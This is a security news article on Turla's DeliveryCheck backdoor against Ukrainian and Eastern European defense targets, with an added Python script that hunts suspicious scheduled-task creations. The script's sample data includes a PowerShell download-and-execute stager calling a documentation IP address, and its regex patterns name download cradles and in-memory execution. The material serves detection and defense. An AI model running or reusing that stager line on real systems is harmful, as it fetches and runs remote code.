Ukraine and Eastern Europe defense sector targeted by .NET-based backdoor
The defense sector in Ukraine and Eastern Europe has been hit by a new backdoor called DeliveryCheck, also known as CAPIBAR or GAMEDAY. This backdoor is written in the .NET programming language and has the ability to deliver further malicious payloads. The attacks have been attributed to a Russian nation-state actor called Turla, according to the Microsoft threat intelligence team and the Computer Emergency Response Team of Ukraine (CERT-UA).
Turla is a known threat actor that has been active for years, targeting various sectors including defense, government, and diplomatic organizations. The group is backed by the Russian government and has a history of sophisticated attacks.
DeliveryCheck is a stealthy backdoor that targets Windows systems, and the infection runs in stages. Delivery is by email: the lure is a document carrying a malicious macro, and opening it with macros enabled installs the backdoor. For persistence, the original report describes a scheduled task that re-downloads DeliveryCheck and launches it in memory, so the implant does not have to live on disk as a standalone executable between runs.
Once installed, DeliveryCheck contacts command-and-control servers operated by the attackers to retrieve tasks. Those tasks can include the launch of additional payloads, which the original report notes are carried inside XSLT stylesheets, giving the operators a way to push new tooling onto compromised systems without changing the initial implant.
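Because the persistence mechanism in the original report is a scheduled task that fetches and runs the backdoor in memory, one practical detection is to review every newly created task. The script below is an added example, not code from the article, from Microsoft or from CERT-UA. It parses the task XML that Windows Security event 4698 ("A scheduled task was created") records in its TaskContent field, decodes any PowerShell -EncodedCommand argument so matching runs on what actually executes, and flags download cradles, in-memory execution, hidden windows, script-host launchers and user-writable staging paths. The heuristics are generic tradecraft, not indicators from any report, and the three event records are constructed samples (198.51.100.7 is a documentation address).

```python
"""Hunt for suspicious scheduled-task creations in Windows Security event 4698.

Added example; assumes the persistence pattern the linked report attributes to
DeliveryCheck (a scheduled task that downloads and runs the backdoor in memory).
All events below are constructed samples, not real telemetry.
"""
import base64
import re
import xml.etree.ElementTree as ET

NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"

# Heuristics for a task action that fetches and runs code rather than starting
# a binary installed on disk. Generic tradecraft, not indicators from any report.
SUSPICIOUS_PATTERNS = [
    ("download cradle", r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer"),
    ("in-memory execution", r"\biex\b|invoke-expression|\[(system\.)?reflection\.assembly\]::load"),
    ("hidden window", r"-w(indowstyle)?\s+hidden"),
    ("script host launcher", r"\b(mshta|wscript|cscript|rundll32|regsvr32)(\.exe)?\b"),
    ("user-writable staging path", r"\\(appdata|temp|users\\public)\\"),
]


def decode_encoded_command(arguments: str):
    """Return the plaintext of a powershell -EncodedCommand argument, or None.

    PowerShell expects base64 of the UTF-16LE script. The field is attacker
    controlled, so anything that does not decode is ignored, not raised.
    """
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", arguments, re.IGNORECASE)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def extract_actions(task_xml: str):
    """Yield (command, arguments) for every <Exec> action in a task definition."""
    root = ET.fromstring(task_xml)
    for exec_node in root.iter(f"{NS}Exec"):
        cmd = (exec_node.findtext(f"{NS}Command") or "").strip()
        args = (exec_node.findtext(f"{NS}Arguments") or "").strip()
        yield cmd, args


def analyze_task(task_xml: str):
    """Return the sorted list of reasons a task definition looks suspicious."""
    reasons = set()
    root = ET.fromstring(task_xml)
    if (root.findtext(f"{NS}Settings/{NS}Hidden") or "").strip().lower() == "true":
        reasons.add("task hidden from the UI")
    for cmd, args in extract_actions(task_xml):
        texts = [f"{cmd} {args}"]
        decoded = decode_encoded_command(args)
        if decoded is not None:
            reasons.add("encoded PowerShell command")
            texts.append(decoded)  # match on what runs, not on the base64 blob
        for text in texts:
            for name, pattern in SUSPICIOUS_PATTERNS:
                if re.search(pattern, text, re.IGNORECASE):
                    reasons.add(name)
    return sorted(reasons)


def hunt(events):
    """Run analyze_task over 4698 EventData records and return only the hits."""
    findings = []
    for ev in events:
        reasons = analyze_task(ev["TaskContent"])
        if reasons:
            findings.append({"task": ev["TaskName"], "user": ev["SubjectUserName"], "reasons": reasons})
    return findings


def build_task_xml(cmd, args, hidden="false"):
    """Build a minimal task definition in the schema event 4698 embeds."""
    return (
        '<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
        f"<Settings><Hidden>{hidden}</Hidden></Settings>"
        f"<Actions><Exec><Command>{cmd}</Command><Arguments>{args}</Arguments></Exec></Actions>"
        "</Task>"
    )


# Constructed samples: one benign built-in task, one encoded stager, one HTA launcher.
STAGER_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage')"
ENCODED_STAGER = base64.b64encode(STAGER_SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    {"TaskName": r"\Microsoft\Windows\Defrag\ScheduledDefrag", "SubjectUserName": "SYSTEM",
     "TaskContent": build_task_xml(r"%windir%\system32\defrag.exe", "-c -h -k -g")},
    {"TaskName": r"\Microsoft\Windows\Maintenance\Update", "SubjectUserName": "jdoe",
     "TaskContent": build_task_xml(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                                   f"-nop -w hidden -enc {ENCODED_STAGER}", hidden="true")},
    {"TaskName": r"\OneDriveSync", "SubjectUserName": "jdoe",
     "TaskContent": build_task_xml("mshta.exe", r"C:\Users\jdoe\AppData\Roaming\sync.hta")},
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(f"{finding['task']} (by {finding['user']}): {', '.join(finding['reasons'])}")
```

In production the events would come from a SIEM export or `Get-WinEvent` rather than the inline list, and the task name deserves its own scrutiny: a task created under a Microsoft-looking path by an ordinary user account, as in the second sample, is worth a look even before the command line is inspected.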
This new backdoor poses a serious threat to the defense sector in Ukraine and Eastern Europe. Being written in .NET is not in itself what makes it hard to catch; managed assemblies decompile readily once an analyst has a sample. The difficulty is operational: the implant is fetched on demand and run in memory, so there may be little on disk beyond a scheduled task definition for file-based scanning to find. The attribution to Turla adds further concern, as this group is known for its advanced capabilities and long-running operations.
To mitigate the risk posed by DeliveryCheck, organizations in the defense sector should tighten controls at each stage of the chain. That means training employees to recognize and report suspicious email attachments, blocking or restricting Office macros (at a minimum for files that arrived from the internet), keeping software and operating systems patched, auditing newly created scheduled tasks and other persistence points, and monitoring outbound traffic so that unexpected connections from workstations and servers to unknown hosts are caught early.
This latest attack highlights the ongoing need for heightened cybersecurity in the defense sector. As threat actors continue to develop new and sophisticated techniques, it is crucial for organizations to stay vigilant and adapt their defenses to protect sensitive information and critical infrastructure.
Original Article: https://thehackernews.com/2023/07/turlas-new-deliverycheck-backdoor.html